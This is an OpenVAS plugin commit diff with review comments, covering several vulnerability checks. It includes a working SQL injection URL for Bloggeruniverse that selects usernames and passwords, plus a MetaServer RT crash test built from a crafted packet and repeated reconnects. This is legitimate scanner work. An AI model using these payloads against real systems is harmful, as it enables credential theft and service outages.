+ script_xref(name: "FEDORA", value: "2011-12698");
+ script_cve_id("CVE-2011-2190", "CVE-2011-2191");
+ script_name("Fedora Update for cherokee FEDORA-2011-12698");
+ desc = "
+
+ Vulnerability Insight:
+ Cherokee is a very fast, flexible and easy to configure Web Server. It supports
+ the widespread technologies nowadays: FastCGI, SCGI, PHP, CGI, TLS and SSL
+ encrypted connections, Virtual hosts, Authentication, on the fly encoding,
+ Apache compatible log files, and much more.
+
+
+ Affected Software/OS:
+ cherokee on Fedora 15
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066222.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of cherokee");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC15")
+{
+
+ if(isrpmvuln(pkg:"cherokee", rpm:"cherokee~1.2.99~1.fc15", rls:"FC15"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for openldap FEDORA-2011-3627
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863542);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"6.8");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2011-3627");
+ script_cve_id("CVE-2011-1024", "CVE-2011-1025", "CVE-2011-1081");
+ script_name("Fedora Update for openldap FEDORA-2011-3627");
+ desc = "
+
+ Vulnerability Insight:
+ OpenLDAP is an open source suite of LDAP (Lightweight Directory Access
+ Protocol) applications and development tools. LDAP is a set of
+ protocols for accessing directory services (usually phone book style
+ information, but other information is possible) over the Internet,
+ similar to the way DNS (Domain Name System) information is propagated
+ over the Internet. The openldap package contains configuration files,
+ libraries, and documentation for OpenLDAP.
+
+
+ Affected Software/OS:
+ openldap on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066251.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of openldap");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"openldap", rpm:"openldap~2.4.23~10.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
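Review bot: the Vulnerability Insight block here is the openldap package description and says nothing about CVE-2011-1024, CVE-2011-1025 or CVE-2011-1081; a one-line summary per CVE belongs in the report text. The release test is also duplicated: release == "FC14" is checked and then rls:"FC14" is passed to isrpmvuln() again, which is harmless but one of the two is enough. Missing newline at end of file, as in the other generated checks.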
Added: trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for libsoup FEDORA-2011-9820
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(863546);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_xref(name: "FEDORA", value: "2011-9820");
+ script_cve_id("CVE-2011-2524");
+ script_name("Fedora Update for libsoup FEDORA-2011-9820");
+ desc = "
+
+ Vulnerability Insight:
+ Libsoup is an HTTP library implementation in C. It was originally part
+ of a SOAP (Simple Object Access Protocol) implementation called Soup, but
+ the SOAP and non-SOAP parts have now been split into separate packages.
+
+ libsoup uses the Glib main loop and is designed to work well with GTK
+ applications. This enables GNOME applications to access HTTP servers
+ on the network in a completely asynchronous fashion, very similar to
+ the Gtk+ programming model (a synchronous operation mode is also
+ supported for those who want it).
+
+
+ Affected Software/OS:
+ libsoup on Fedora 14
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066219.html
+
+ ";
+
+ script_description(desc);
+ script_summary("Check for the Version of libsoup");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_require_keys("ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC14")
+{
+
+ if(isrpmvuln(pkg:"libsoup", rpm:"libsoup~2.32.2~2.fc14", rls:"FC14"))
+ {
+ security_hole(0);
+ exit(0);
+ }
+
+ exit(0);
+}
\ No newline at end of file
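Review bot: the Vulnerability Insight text describes libsoup in general and never mentions CVE-2011-2524, so the finding does not tell the administrator what the fixed update addresses. Inside if(release == "FC14") both paths end in exit(0), so the trailing exit(0) and the extra braces around the isrpmvuln() test add nothing; a single if(isrpmvuln(...)) security_hole(0); after the release test reads cleaner. The file lacks a trailing newline.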
Modified: trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -7,6 +7,9 @@
# Authors:
# Chandan S <schandan at secpod.com>
#
+# Updated By: Antu Sanadi <santu at secpod.com> on 2011-09-27
+# Updated to detect the recent versions.
+#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net
#
@@ -27,16 +30,13 @@
if(description)
{
script_id(800096);
- script_version("$Revision: 1.0 $");
+ script_version("$Revision: 1.1$");
script_tag(name:"risk_factor", value:"None");
script_name("Merak Mail Server Web Mail Version Detection");
desc = "
-
Overview: This script will detect the version of Merak Mail Server Web Mail
- on the remote host and sets the KB.
+ on the remote host and sets the KB.";
- Risk factor: None";
-
script_description(desc);
script_summary("Set KB for the version of Merak Mail Server");
script_category(ACT_GATHER_INFO);
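Review bot: the new script_version value "$Revision: 1.1$" drops the space before the closing dollar that the removed line "$Revision: 1.0 $" had; Subversion expands the keyword only in the forms "$Revision$" and "$Revision: ... $", so the shorter form will stay a literal string. Removing "Risk factor: None" from desc is consistent with the risk_factor script_tag that already carries it.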
@@ -47,54 +47,72 @@
}
+include("cpe.inc");
include("http_func.inc");
-include("cpe.inc");
include("host_details.inc");
## Constant values
SCRIPT_OID = "1.3.6.1.4.1.25623.1.0.800096";
SCRIPT_DESC = "Merak Mail Server Web Mail Version Detection";
-port = 32000;
-banner = get_http_banner(port);
+## Get the default port
+port = get_http_port(default:80);
+if(!port){
+ port = 32000;
+}
-if("IceWarp" >!< banner){
+## Check the port status
+if(!get_port_state(port)){
exit(0);
}
-smtpPort = get_kb_item("Services/smtp");
-if(!smtpPort){
- smtpPort = 25;
+banner = get_http_banner(port);
+if("IceWarp" >!< banner){
+ exit(0);
}
-imapPort = get_kb_item("Services/imap");
-if(!imapPort){
- imapPort = 143;
-}
+version = eregmatch(pattern:"(Merak|IceWarp).?([0-9.]+)", string:banner);
+if(version[2] == NULL)
+{
+ smtpPort = get_kb_item("Services/smtp");
+ if(!smtpPort){
+ smtpPort = 25;
+ }
-popPort = get_kb_item("Services/pop3");
-if(!popPort){
- popPort = 110;
+ imapPort = get_kb_item("Services/imap");
+ if(!imapPort){
+ imapPort = 143;
+ }
+
+ popPort = get_kb_item("Services/pop3");
+ if(!popPort){
+ popPort = 110;
+ }
+
+ foreach port (make_list(smtpPort, imapPort, popPort))
+ {
+ banner = get_kb_item(string("Banner/", port));
+ if(banner =~ "IceWarp|Merak")
+ {
+ version = eregmatch(pattern:"(Merak|IceWarp) ([0-9.]+)", string:banner);
+ if(version[2] != NULL){
+ ver = version[2];
+ }
+ }
+ }
}
+else if(version[2] != NULL){
+ ver = version[2];
+}
-foreach port (make_list(smtpPort, imapPort, popPort))
+if(ver)
{
- banner = get_kb_item(string("Banner/", port));
- if(banner =~ "IceWarp|Merak")
- {
- ver = eregmatch(pattern:"(Merak|IceWarp) ([0-9.]+)", string:banner);
- if(ver[2] != NULL)
- {
- set_kb_item(name:"MerakMailServer/Ver", value:ver[2]);
- security_note(data:"Merak Mail Server Web Mail version " + ver[2] +
+ set_kb_item(name:"MerakMailServer/Ver", value:ver);
+ security_note(data:"Merak Mail Server Web Mail version " + ver +
" was detected on the host");
-
- ## build cpe and store it as host_detail
- cpe = build_cpe(value:ver[2], exp:"^([0-9.]+)", base:"cpe:/a:icewarp:merak_mail_server:");
- if(!isnull(cpe))
- register_host_detail(name:"App", value:cpe, nvt:SCRIPT_OID, desc:SCRIPT_DESC);
-
- }
- exit(0);
+ ## build cpe and store it as host_detail
+ cpe = build_cpe(value:ver, exp:"^([0-9.]+)", base:"cpe:/a:icewarp:merak_mail_server:");
+ if(!isnull(cpe)){
+ register_host_detail(name:"App", value:cpe, nvt:SCRIPT_OID, desc:SCRIPT_DESC);
}
}
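Review bot: the foreach over the mail ports reuses the variable port, so after the loop port no longer holds the HTTP port validated above; nothing in this hunk reads it afterwards, but any later addition that does (for example passing a port to security_note or register_host_detail) will silently pick up the last mail port tested. Use a distinct loop variable. The fallback if(!port){ port = 32000; } only runs if get_http_port() can return a false value; if it exits when the selected port is closed, as the http_func.inc implementation of this period does, the old behaviour of probing 32000 is lost, so either pass 32000 as the default or keep an explicit second probe. Finally, else if(version[2] != NULL) restates the negation of the condition just tested; a plain else is enough.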
Added: trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,106 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_bloggeruniverse_sql_injection_vuln.nasl 17111 2011-09-26 11:29:14 sep $
+#
+# Bloggeruniverse 'editcomments.php' SQL Injection Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902632);
+ script_version("$Revision: 1.0$");
+ script_cve_id("CVE-2009-5090");
+ script_bugtraq_id(33744);
+ script_tag(name:"cvss_base", value:"6.8");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("Bloggeruniverse 'editcomments.php' SQL Injection Vulnerability");
+ desc = "
+ Overview: The host is running Bloggeruniverse and is prone to sql injection
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is due to input passed via the 'id' parameter to 'editcomments.php'
+ is not properly sanitised before being used in SQL queries.
+
+ Impact:
+ Successful exploitation will let attackers to manipulate SQL queries by
+ injecting arbitrary SQL code.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Bloggeruniverse version 2 Beta.
+
+ Fix: No solution or patch is available as on 27th September 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://sourceforge.net/projects/bloggeruniverse/
+
+ References:
+ http://www.exploit-db.com/exploits/8043/
+ http://xforce.iss.net/xforce/xfdb/48697 ";
+
+ script_description(desc);
+ script_copyright("Copyright (c) 2011 SecPod");
+ script_summary("Check if Bloggeruniverse is vulnerable to SQL Injection");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+ exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+ exit(0);
+}
+
+## Check for each possible path
+foreach dir (make_list("/bloggeruniverse", "/blog", "/bg", cgi_dirs()))
+{
+ ## Send and Receive the response
+ sndReq = http_get(item:string(dir, "/index.php"), port:port);
+ rcvRes = http_send_recv(port:port, data:sndReq);
+
+ if("Bloggeruniverse" >< rcvRes && "CopyRight ©" >< rcvRes)
+ {
+ ## Construct the Attack Request
+ url = dir + "/editcomments.php?id=-2%20union%20all%20select%201,2,3,4,5" +
+ ",6,concat(0x4f70656e564153,0x3a,username,0x3a,password,0x3a,0" +
+ "x4f70656e5641532d53),8%20from%20users";
+
+ if(http_vuln_check(port:port, url:url, pattern:">openVAS:(.+):(.+):openVAS"))
+ {
+ security_hole(port);
+ exit(0);
+ }
+ }
+}
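Review bot: the marker injected in the request, 0x4f70656e564153, decodes to "OpenVAS" with a capital O, while the pattern given to http_vuln_check() looks for "openVAS"; this only matches if http_vuln_check() compares case-insensitively, so use the same spelling in both places. The application test "CopyRight ©" >< rcvRes depends on the copyright sign arriving in the same byte encoding as this source file; a page served in another charset never matches, so anchor on the ASCII part instead. include("version_func.inc") is unused here. Since the check is ACT_ATTACK and the confirmation pattern captures the username and password columns into the match, a marker-only select (the concat already carries the OpenVAS markers) would confirm the flaw without copying credentials into the scan report.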
Added: trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 17461 2011-09-27 10:42:13Z sep $
+#
+# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902478);
+ script_version("$Revision: 1.0$");
+ script_cve_id("CVE-2011-3579", "CVE-2011-3580");
+ script_bugtraq_id(49753);
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability");
+ desc = "
+ Overview: The host is running IceWarp Mail Server and is prone to xml entity
+ injection and information disclosure vulnerability.
+
+ Vulnerability:
+ The flaws are caused due to,
+ - Certain input passed via SOAP messages to 'server/webmail.php' is not
+ properly verified before being used. This can be exploited to disclose the
+ contents of arbitrary files.
+ - An unspecified script, which calls the 'phpinfo()' function, is stored with
+ insecure permissions inside the web root. This can be exploited to gain
+ knowledge of sensitive information.
+
+ Impact:
+ Successful exploitation will let the attacker to gain access to potentially
+ sensitive information, and possibly cause denial-of-service conditions. other
+ attacks may also be possible.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ IceWarp Mail Server 10.3.2 and prior.
+
+ Fix: Upgrade to IceWarp Mail Server 10.3.3 or later,
+ For updates refer, http://www.icewarp.com
+
+ References:
+ http://secunia.com/advisories/46135/
+ http://xforce.iss.net/xforce/xfdb/70026
+ http://xforce.iss.net/xforce/xfdb/70025
+ http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt ";
+
+ script_description(desc);
+ script_summary("Check for the version of IceWarp Mail Server");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 SecPod");
+ script_family("Web application abuses");
+ script_dependencies("gb_merak_mail_server_detect.nasl");
+ script_require_keys("MerakMailServer/Ver");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from kb
+icewarp = get_kb_item("MerakMailServer/Ver");
+if(!icewarp){
+ exit(0);
+}
+
+## Check for IceWarp Mail Server version < 10.3.3
+if(version_is_less(version:icewarp, test_version:"10.3.3")){
+ security_warning(0);
+}
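Review bot: version_is_less(version:icewarp, test_version:"10.3.3") agrees with the description (10.3.2 and prior affected, 10.3.3 fixes), but the KB value comes from the banner regex in gb_merak_mail_server_detect.nasl, which captures a truncated value such as "10.3" when a banner omits the patch level; that compares as less than "10.3.3" and would flag every 10.3.x server regardless of patch level. Not fixable in this file, but worth a comment above the test. The description has grammar slips for the next edit: "prone to xml entity injection and information disclosure vulnerability" (vulnerabilities), "The flaws are caused due to," (are due to:), "will let the attacker to gain" (let the attacker gain), "conditions. other attacks" (Other), and "or later," should end with a period.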
Modified: trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -64,13 +64,13 @@
script_copyright("Copyright (C) 2011 SecPod");
script_family("Denial of Service");
script_dependencies("find_service.nes");
- script_require_ports(2194);
+ script_require_ports(2189);
exit(0);
}
## Get Default Port
-port = 2194;
+port = 2189;
if(!get_port_state(port)){
exit(0);
}
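Review bot: the port appears twice as a literal, in script_require_ports(2189) and in port = 2189; the previous value 2194 was duplicated the same way and this change had to touch both, so define it once, or read it from the service KB with a default, so the two cannot drift apart again. Since the default port is what changed, the header comment block should record the update the way gb_merak_mail_server_detect.nasl does in this same commit.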
@@ -82,15 +82,34 @@
}
## Construct Attack Request
-req = crap(data: raw_string(0x80), length:1024);
+req = raw_string( 0xcd, 0xab, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x52, 0x4f, 0x53, 0x43,
+ 0x4f );
## Sending Attack
send(socket:soc, data:req);
+res = recv(socket:soc, length:200);
close(soc);
-## Waiting
-sleep(3);
+## Confirm the application
+if("Metastock" >!< res){
+ exit(0);
+}
+## Send multiple reconnection request
+for(i = 0; i < 5; i++)
+{
+ soc1 = open_sock_tcp(port);
+ if(!soc1){
+ break;
+ }
+
+ send(socket:soc1, data:req);
+ close(soc1);
+ sleep(1);
+}
+
## Open the socket and Check server is dead or alive
soc = open_sock_tcp(port);
if(!soc)
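Review bot: the comments no longer match the code: "## Construct Attack Request" and "## Sending Attack" now sit above the request used to confirm the application ("Metastock" in the reply), while the actual attack is the reconnection loop below; rename both. In that loop, break on a failed connect is followed immediately by the liveness test, so two consecutive connect failures are reported as a denial of service with no pause between them; a short sleep before the final open_sock_tcp() (the removed sleep(3) did this) would reduce false positives from a server that is merely slow to accept. "Metastock" >!< res also exits quietly when recv() returns NULL, which is acceptable, but if a non-answering service should be logged, test isnull(res) separately.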
@@ -98,5 +117,4 @@
security_hole(port);
exit(0);
}
-
close(soc);
Added: trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl 2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl 2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,100 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_tooltalk_rpc_database_server_mult_vuln.nasl 17217 2011-09-23 12:14:17 sep $
+#
+# CDE ToolTalk RPC Database Server Multiple Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(902477);
+ script_version("$Revision: 1.0$");
+ script_cve_id("CVE-2002-0677", "CVE-2002-0678");
+ script_bugtraq_id(5083, 5082);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("CDE ToolTalk RPC Database Server Multiple Vulnerabilities");
+ desc = "
+ Overview: This host is running the CDE ToolTalk Database Server and is
+ prone to the multiple vulnerabilities.
+
+ Vulnerability Insight:
+ Multiple flaws are due to,
+ - An error in the handling symbolic link. The server does not check to ensure
+ that it is not a symbolic link. If an attacker creates a symbolic link on
+ the filesystem with the path/filename of the logfile, transaction data will
+ be written to the destination file as root.
+ - There are no checks to restrict the range of the index value. Consequently,
+ malicious file descriptor values supplied by remote clients may cause
+ writes to occur far beyond the table in memory. The only value written is
+ a NULL word, limiting the consequences.
+
+ Impact:
+ Successful exploitation could allow attackers to remotely deleting arbitrary
+ files and creating arbitrary directory entries. Further, attackers might be
+ able to crash the ToolTalk RPC database server, denying service to legitimate
+ users.
+
+ Impact Level: System/Application
+
+ Affected Software :
+ CDE ToolTalk RPC database server
+
+ Fix: Apply the patch from below link,
+ http://www.kb.cert.org/vuls/id/975403
+
+ References:
+ http://www.kb.cert.org/vuls/id/975403
+ http://www.kb.cert.org/vuls/id/299816
+ http://www.kb.cert.org/vuls/id/AAMN-5B239R
+ http://www.cert.org/advisories/CA-2002-20.html ";
+
+ script_description(desc);
+ script_copyright("Copyright (c) 2011 SecPod,");
+ script_summary("Checks the presence of CDE ToolTalk RPC Database Server");
+ script_category(ACT_GATHER_INFO);
+ script_family("RPC");
+ script_dependencies("secpod_rpc_portmap.nasl");
+ script_require_keys("rpc/portmap");
+ exit(0);
+}
+
+include("misc_func.inc");
+
+if(report_paranoia < 2){
+ exit(0);
+}
+
+RPC_PROG = 100083;
+
+## Get the rpc port, CDE ToolTalk Database Server
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP);
+if(port)
+{
+ security_hole(port);
+ exit(0);
+}
+
+port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_TCP);
+if(port){
+ security_hole(port);
+}
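Review bot: this check reports a hole whenever program 100083 is registered with the portmapper, on UDP or TCP, and performs no version or patch test, so a server already fixed per CERT VU#975403 triggers it exactly like a vulnerable one; gating on report_paranoia >= 2 is right, and the Fix text should state that the finding is presence-based so administrators who have applied the patch know to treat it accordingly. Minor: script_copyright("Copyright (c) 2011 SecPod,") has a stray trailing comma, and the Insight text should read "An error in the handling of symbolic links" and "allow attackers to remotely delete arbitrary files and create arbitrary directory entries".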